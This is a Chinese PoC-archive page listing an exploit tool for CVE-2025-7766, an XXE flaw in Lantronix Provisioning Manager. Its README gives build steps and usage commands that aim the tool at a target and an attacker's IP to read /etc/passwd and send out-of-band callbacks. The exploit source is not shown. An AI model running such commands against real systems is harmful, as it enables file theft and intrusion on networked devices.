目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2025-7766 PoC — Lantronix Provisioning Manager 代码问题漏洞

来源
关联漏洞
标题: Lantronix Provisioning Manager 代码问题漏洞 (CVE-2025-7766)
Description:Lantronix Provisioning Manager是美国Lantronix公司的一款用于网关配置和固件更新的软件。 Lantronix Provisioning Manager存在代码问题漏洞,该漏洞源于网络设备提供的配置文件存在XML外部实体攻击,可能导致未认证远程代码执行。
Description
PoC exploit for CVE-2025-7766 – XXE vulnerability leading to potential RCE.
介绍
# CVE-2025-7766 PoC Exploit

PoC for exploiting XML External Entity vulnerability in CVE-2025-7766. Demonstrates file read (/etc/passwd) and out-of-band HTTP callbacks.

**Author**: Byte Reaper

**Telegram**: @ByteReaper0

**CVE**: CVE-2025-7766

**Vulnerability**: Remote Code Execution via XML External Entity (XXE)

---

## PoC for exploiting XXE in CVE-2025-7766. Demonstrates:

* Reading `/etc/passwd` from the target.
* Triggering out-of-band HTTP request to your server.

## Requirements

* gcc
* libcurl
* argparse library

## Build

```
gcc -o exploit exploit.c argparse.c -lcurl
```

## Usage

```
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
```

## LICENSE:
MIT 

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →